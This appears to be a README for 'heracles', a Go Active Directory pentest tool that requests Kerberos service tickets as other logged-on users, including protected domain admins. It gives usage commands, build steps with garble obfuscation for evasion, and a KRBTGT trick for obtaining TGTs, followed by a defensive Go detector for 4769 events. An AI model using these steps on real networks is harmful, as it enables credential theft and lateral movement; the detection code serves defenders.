snowpeacock/heracles

heracles

Go project to abuse SeTcbPrivilege to request service tickets on behalf of loggedon users (the 12th labour)

Use

Heracles is an Active Directory pentest tool that uses LsaCallAuthenticationPackage to request a Kerberos service ticket as another connected user. This makes it possible to target protected users (unlike LSASS dump methods) and is probably stealthier than basic impersonation techniques.

First run klist sessions to get the LUID of the victim's logon session (a connected user, or the machine account's session 0x3e7). Then use heracles to get a base64-encoded ticket for any service:

heracles.exe -spn HOST/DC.MINI.LAB -luid 0x1bb70d

The ticket is a base64-encoded kirbi file; you can use it with Rubeus or convert it for use with impacket tools.

Demo

Dumping a service ticket to access the domain controller as a logged-on domain admin (protected user), then using it with impacket tools on another computer (screenshots in the original README).

Compile

Compile with something like:

GOOS=windows GOARCH=amd64 go build -o heracles.exe -ldflags="-s -w" main.go

Use garble to compile your personal obfuscated version with:

GOOS=windows GOARCH=amd64 garble -literals -seed=random -tiny build -o hercules_ofs.exe -ldflags="-s -w" main.go

What if I really want a TGT?

Sure, request a service ticket for KRBTGT/YOURDOMAIN. This could lead to detection if the Domain Controller keeps track of which computer requested the TGT and which computer used it (screenshots in the original README).
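The detection the sentence above hints at can be written down concretely. The following Go program is an added example for defenders and is not part of the heracles project: it reads a handful of constructed Windows Security 4769 records (a TGS-REQ for the krbtgt service is how a TGT obtained this way shows up on the DC), remembers which client address obtained a TGT for each account, and flags any later service-ticket request for that account that arrives from a different address. The event records, account names and addresses are all made up for the example; the field names mirror the real 4769 XML fields.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Event4769 is a reduced view of Windows Security event 4769
// ("A Kerberos service ticket was requested") as logged on a domain controller.
// Field names follow the event's XML fields; all values used below are constructed.
type Event4769 struct {
	Time        time.Time
	TargetUser  string // account the ticket was issued to, e.g. "admin@MINI.LAB"
	ServiceName string // service account of the requested SPN; "krbtgt" when a TGT was requested
	IpAddress   string // address of the host that sent the TGS-REQ
}

// Finding records a TGT that was obtained from one host and then used from another.
type Finding struct {
	User       string
	ObtainedBy string
	UsedFrom   string
	Service    string
	At         time.Time
}

// tgtUsedElsewhere correlates TGT issuance with later use: for each account it
// remembers the client address of the most recent TGS-REQ for krbtgt, then flags
// any later service-ticket request for that account coming from another address.
// Events are processed in time order regardless of input order.
func tgtUsedElsewhere(events []Event4769) []Finding {
	sorted := append([]Event4769(nil), events...)
	sort.Slice(sorted, func(i, j int) bool { return sorted[i].Time.Before(sorted[j].Time) })

	type issuance struct {
		addr string
		at   time.Time
	}
	lastTGT := map[string]issuance{} // lower-cased account -> most recent TGT issuance
	var findings []Finding

	for _, ev := range sorted {
		key := strings.ToLower(ev.TargetUser)
		if strings.EqualFold(ev.ServiceName, "krbtgt") {
			// A TGT obtained via TGS-REQ: normal for renewals, but also exactly
			// what a request for KRBTGT/<domain> produces. Record who got it.
			lastTGT[key] = issuance{addr: ev.IpAddress, at: ev.Time}
			continue
		}
		if iss, ok := lastTGT[key]; ok && iss.addr != ev.IpAddress {
			findings = append(findings, Finding{
				User: ev.TargetUser, ObtainedBy: iss.addr, UsedFrom: ev.IpAddress,
				Service: ev.ServiceName, At: ev.Time,
			})
		}
	}
	return findings
}

// sampleEvents returns constructed 4769 records: a domain admin works from
// 10.0.0.50, a TGT is requested for that admin from the same host, and the
// next service ticket for the admin is requested from 10.0.0.99.
func sampleEvents() []Event4769 {
	at := func(hhmm string) time.Time {
		v, _ := time.Parse("2006-01-02 15:04", "2024-01-15 "+hhmm)
		return v
	}
	return []Event4769{
		{Time: at("10:00"), TargetUser: "admin@MINI.LAB", ServiceName: "DC$", IpAddress: "10.0.0.50"},
		{Time: at("10:05"), TargetUser: "admin@MINI.LAB", ServiceName: "krbtgt", IpAddress: "10.0.0.50"},
		{Time: at("10:06"), TargetUser: "admin@MINI.LAB", ServiceName: "DC$", IpAddress: "10.0.0.99"},
		{Time: at("10:07"), TargetUser: "bob@MINI.LAB", ServiceName: "FS01$", IpAddress: "10.0.0.51"},
	}
}

func main() {
	for _, f := range tgtUsedElsewhere(sampleEvents()) {
		fmt.Printf("%s: TGT for %s obtained from %s, service ticket for %s then requested from %s\n",
			f.At.Format(time.RFC3339), f.User, f.ObtainedBy, f.Service, f.UsedFrom)
	}
}
```

Two caveats for anyone turning this into a real rule: 4769 is only logged when "Audit Kerberos Service Ticket Operations" is enabled on the domain controllers, and a user whose address legitimately changes between requests (VPN reconnects, roaming laptops) will produce the same mismatch, so the finding is a lead to correlate with logon-session data rather than a verdict on its own. Renewals from the same host are deliberately not flagged.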

Acknowledgement
